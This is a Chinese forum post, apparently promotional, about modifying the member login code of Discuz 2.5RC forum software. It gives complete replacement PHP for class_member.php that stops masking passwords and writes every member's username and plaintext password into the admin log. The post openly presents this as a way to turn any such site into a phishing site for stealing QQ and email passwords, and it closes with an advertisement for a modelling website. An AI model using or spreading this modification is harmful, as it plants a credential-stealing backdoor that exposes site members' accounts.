|
这个漏洞在后台,不在前台。我们可以把所有的DZ网站都做成一个钓鱼网站,盗别人QQ、邮箱密码。非常好用。一般人我不告诉他。^_^
之前别人有发布了2.0版本的运行记录的漏洞。我这里就不重复了。
2.5RC的漏洞原理和2.0一样,不过是改变了一些变量而已。
只要会员在前台一登陆,那么密码用户名密码等信息就会如实写入到后台的运行记录。不信,你按着我说的方法试一下。我已经测试成功。^_^
在/source/class/class_member.php这个页面。找出这句话:
$password = preg_replace("/^(.{".round(strlen($_GET['password']) / 4)."})(.+?)(.{".round(strlen($_GET['password']) / 6)."})$/s", "\\1***\\3", $_GET['password']);
$errorlog = dhtmlspecialchars(
TIMES**P."\t".
($result['ucresult']['username'] ? $result['ucresult']['username'] : $_GET['username'])."\t".
$password."\t".
"Ques #".intval($_GET['questionid'])."\t".
$_G['clientip']);
writelog('illegallog', $errorlog);
改成如下代码:
/*记录密码开始*/
/*$password = preg_replace("/^(.{".round(strlen($_GET['password']) / 4)."})(.+?)(.{".round(strlen($_GET['password']) / 6)."})$/s", "\\1***\\3", $_GET['password']);*/
$password = $_GET['password'];
$errorlog = dhtmlspecialchars(
TIMES**P."\t".
($result['ucresult']['username'] ? $result['ucresult']['username'] : $_GET['username'])."\t".
$password."\t".
"Ques #".intval($_GET['questionid'])."\t".
$_G['clientip']);
writelog('illegallog', $errorlog);
/*记录密码结束*/
插入到
if($result['status'] > 0) {
之后即可。
覆盖原文件,你会发现,所有从前台登陆进来的用户名和密码,你都能看得一清二楚了。
发布这个文档,是想做一个广告哈。请管管不要删除,我这是为人民服务,为了让社会变得更加和谐。
要玩私拍,上女模网。
女模网:http://www.nvmote.net
转载本文的时候,不要漏了这句话哦。^_^ |
|